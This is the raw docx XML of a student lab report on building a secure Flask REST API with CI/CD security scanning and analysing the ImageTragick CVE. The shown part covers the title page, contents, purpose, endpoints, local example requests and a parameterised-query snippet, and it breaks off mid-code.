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595959"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HDU  |  Information Security Laboratory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:t>Work 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Secure REST API Development with CI/CD</w:t>
        <w:br/>
        <w:t>and Real CVE Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="2E74B5"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4706"/>
        <w:gridCol w:w="4706"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Work</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Work 1 - Secure REST API Development with CI/CD and Real CVE Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Surname and Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Wei Lixuan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>HDU number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>23320107</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:hyperlink r:id="rId11">
              <w:r>
                <w:rPr>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://github.com/EggplantPig/WeiLixuan23320107-IS-Work-1</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Last successful pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:hyperlink r:id="rId12">
              <w:r>
                <w:rPr>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://github.com/EggplantPig/WeiLixuan23320107-IS-Work-1/actions/runs/40357227529</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>26 October 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.  Purpose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2.  Secure REST API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3.  CI/CD Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4.  Real CVE: CVE-2016-3714 (ImageMagick ImageTragick)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5.  Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>6.  References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Appendix A.  Full Reproduction Command Sequence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Appendix B.  Repository Layout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Appendix C.  Work 1 Deliverable Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Appendix D.  API Test Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Appendix E.  SCA Report Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>1.  Purpose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The purpose of this work is to build a secure REST API, integrate static application security testing (SAST) and software composition analysis (SCA) into a CI/CD pipeline, reproduce a real CVE in a controlled and authorised local environment, analyse its root cause, apply a fix, and prove that the attack no longer works while normal functionality is preserved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The work has two parts. The first part is the application itself: a Flask API with three required methods, SQL-injection protection, XSS protection, JWT-based authentication and bcrypt password hashing. The second part is the vulnerability lifecycle: the ImageMagick ImageTragick vulnerability CVE-2016-3714 is reproduced inside a Vulhub Docker environment, fixed, and verified with a regression test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>2.  Secure REST API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The API is implemented in Python 3.11 with Flask 3.1.3 and SQLite. Passwords are hashed with bcrypt 5.0.0, and JWTs are issued and verified with PyJWT 2.15.1. The project uses the Flask application-factory and blueprint structure. The full source code and setup instructions are in the repository README.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>2.1  Endpoints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cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Authenticates login and password; returns a signed JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/api/data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bearer JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Returns the list of posts; only authenticated users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/api/data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bearer JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Creates a post; demonstrates parameterised writes and XSS escaping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>The third endpoint was chosen deliberately as a write endpoint. It exercises the security controls on the write path: a parameterised INSERT, output escaping, JWT authorisation and input validation. A read-only third endpoint would cover fewer of the security requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>2.2  Example requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># Login</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -s -X POST http://127.0.0.1:5000/auth/login \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"login":"alice","password":"Alice-Strong-Pass-1!"}'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># Read data (replace &lt;TOKEN&gt; with the returned JWT)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -s http://127.0.0.1:5000/api/data \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: Bearer &lt;TOKEN&gt;"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># Create a post</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -s -X POST http://127.0.0.1:5000/api/data \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: Bearer &lt;TOKEN&gt;" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"title":"Hello","content":"First post"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>2.3  Security controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>2.3.1  SQL-injection protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Every database operation uses SQLite parameterised queries with question-mark placeholders. No SQL string is constructed by concatenation. The following examples are taken from app/auth.py and app/api.py:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>user = db.execute(</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id, username, password_hash FROM users WHERE username = ?",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    (login_name.strip(),),</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>).fetchone()</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
